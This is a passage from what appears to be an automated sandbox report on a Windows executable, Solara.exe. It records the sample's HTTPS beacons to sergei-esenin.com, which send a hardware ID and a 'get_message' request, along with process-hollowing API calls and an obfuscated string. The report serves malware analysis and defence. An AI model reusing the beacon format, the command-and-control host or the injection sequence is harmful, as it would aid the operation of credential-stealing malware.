2024-10-12 23:33:13 UTC	1369	IN	Data Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
2024-10-12 23:33:13 UTC	889	IN	Data Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
2024-10-12 23:33:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	104.21.53.8	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:14 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1091 Host: sergei-esenin.com
2024-10-12 23:33:14 UTC	1091	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 32 30 44 42 32 42 44 42 32 45 45 39 41 31 44 41 32 43 44 41 37 38 35 35 33 45 41 43 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 41 73 4e 4e 32 2d 2d 36 38 31 31 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B920DB2BDB2EE9A1DA2CDA78553EAC6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"1AsNN2--68110
2024-10-12 23:33:14 UTC	557	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2BXeKCMMFIRy19zG%2BO%2B5pEMkHXTzUodahqVEFHvYyEgQ4SodeXiJWJPrSXOr6JRtysuh5b3rmi0Jlqjtz7FVLmh5JNr9FMUaUueCApBKjO%2F9oJpUPn1CwY3ehvRWKSYir1fhcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4cb385c7283-EWR
2024-10-12 23:33:14 UTC	812	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 23:33:14 UTC	1369	IN	Data Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
2024-10-12 23:33:14 UTC	1369	IN	Data Raw: 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: anagement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-12 23:33:14 UTC	891	IN	Data Raw: 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d Data Ascii: > <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id=
2024-10-12 23:33:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49742	104.21.53.8	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: sergei-esenin.com
2024-10-12 23:33:14 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 41 73 4e 4e 32 2d 2d 36 38 31 31 30 31 38 37 30 30 26 6a 3d 26 68 77 69 64 3d 42 39 32 30 44 42 32 42 44 42 32 45 45 39 41 31 44 41 32 43 44 41 37 38 35 35 33 45 41 43 36 42 Data Ascii: act=get_message&ver=4.0&lid=1AsNN2--6811018700&j=&hwid=B920DB2BDB2EE9A1DA2CDA78553EAC6B
2024-10-12 23:33:14 UTC	555	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJQ9Sb6Yi6dFLVm7VfEcDKkJw1lSG%2Fc%2BNneNQH4TWfOIvoBdpdvJAAe5VTs6QTiOlsWO7Aopp5xbwlNCLMLfDboV4dqvx%2BO8OqrbnhvNeeQAwtcOsqOUqyF7fVGe9%2BlczaGSgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4cf7f7f41bb-EWR
2024-10-12 23:33:14 UTC	814	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 23:33:14 UTC	1369	IN	Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
2024-10-12 23:33:14 UTC	1369	IN	Data Raw: 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 Data Ascii: agement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <i
2024-10-12 23:33:14 UTC	889	IN	Data Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 Data Ascii: <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="b
2024-10-12 23:33:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	19:33:00
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\Solara.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Solara.exe"
Imagebase:	0xc20000
File size:	1'003'008 bytes
MD5 hash:	25E61FD473A4A437C052FE60E4A76E0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:33:01
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\Solara.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Solara.exe"
Imagebase:	0xc20000
File size:	1'003'008 bytes
MD5 hash:	25E61FD473A4A437C052FE60E4A76E0A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	2.9%
Signature Coverage:	12.1%
Total number of Nodes:	315
Total number of Limit Nodes:	19

Executed Functions

Function 00D0FABD Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00D0FC53
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D0FC66
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00D0FC84
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D0FCA8
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00D0FCD3
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00D0FD2B
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00D0FD76
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D0FDB4
Wow64SetThreadContext.KERNEL32(?,?), ref: 00D0FDF0
ResumeThread.KERNELBASE(?), ref: 00D0FDFF

Strings

GetP, xrefs: 00D0FB3D
Load, xrefs: 00D0FAF9
aryA, xrefs: 00D0FB01
ress, xrefs: 00D0FB45

Memory Dump Source

Source File: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
Instruction ID: a80dfd28014f547e0089764fba5222fc97e051c81cf4b5572e5a4522d4a27047
Opcode Fuzzy Hash: 886e9992cd1654a34a765e8d7cb157db1c9d64fce11569bf78f58931c1f670f7
Instruction Fuzzy Hash: A1B10B7664024AAFDB60CF68CC80BDA73A5FF88714F258524EA0CAB741D774FA51CB94

Function 00C22606 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142
memorysynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00D0F930,000004E4,00000040,?,?,IOanz UZA891nNAIUsy U(Ahy8*! ), ref: 00C22740
CreateThread.KERNELBASE(00000000,00000000,Function_000EFAB8,MZx,00000000,00000000), ref: 00C2276C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00C22777
CloseHandle.KERNEL32(00000000), ref: 00C2277E

Strings

MZx, xrefs: 00C22748, 00C22764
IOanz UZA891nNAIUsy U(Ahy8*! , xrefs: 00C226DE

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: CloseCreateHandleObjectProtectSingleThreadVirtualWait
String ID: IOanz UZA891nNAIUsy U(Ahy8*! $MZx
API String ID: 1960030328-2632814837
Opcode ID: 1ce7fe98f5ae9e8dfbdf164153f28905ddea4132783d1762584aec221c8aac80
Instruction ID: 9a69fe8d937ddd19bd348c3c0f9c929742b58a2329497abb0a82790a445422d0
Opcode Fuzzy Hash: 1ce7fe98f5ae9e8dfbdf164153f28905ddea4132783d1762584aec221c8aac80
Instruction Fuzzy Hash: A5417D325046266BD308EB70EC52BFFB769EF48720F504125F912976E0DA388A02C694

Function 00C9799C Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19091bb021673b017cd853723abdbcd3c7ab0cdcc84aa568a1b5f50c7d23d2d7
Instruction ID: 06880cb090759ecd5c0b46787fd838d40f8df69c641789dfd0e3f4b7e8cdcb1c
Opcode Fuzzy Hash: 19091bb021673b017cd853723abdbcd3c7ab0cdcc84aa568a1b5f50c7d23d2d7
Instruction Fuzzy Hash: 3BE04632926268EBCB14DB98890898AB2ACEB45B00B260196B505E3100C270DE00D7D0

Function 00C86E1E Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c011ce0c28a398ff6a9fdfd5d9cd476b723b06e1b38a2bbbe27cda790980bd
Instruction ID: 980f8c52ebbed9b45e0d1fd3ab404d983bd4be8a638fa78b873484f31296849a
Opcode Fuzzy Hash: 49c011ce0c28a398ff6a9fdfd5d9cd476b723b06e1b38a2bbbe27cda790980bd
Instruction Fuzzy Hash: 76C08C7800190046CE29AD20C7713A83354E392786FC0188CC8620B742C91E9D83E700

Function 00C8B7D9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00C8B8E6,?,?,00000000,00000000,?,?,00C8BCAD,00000021,FlsSetValue,00CAE9FC,00CAEA04,00000000), ref: 00C8B89A

Strings

ext-ms-, xrefs: 00C8B844
api-ms-, xrefs: 00C8B830

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
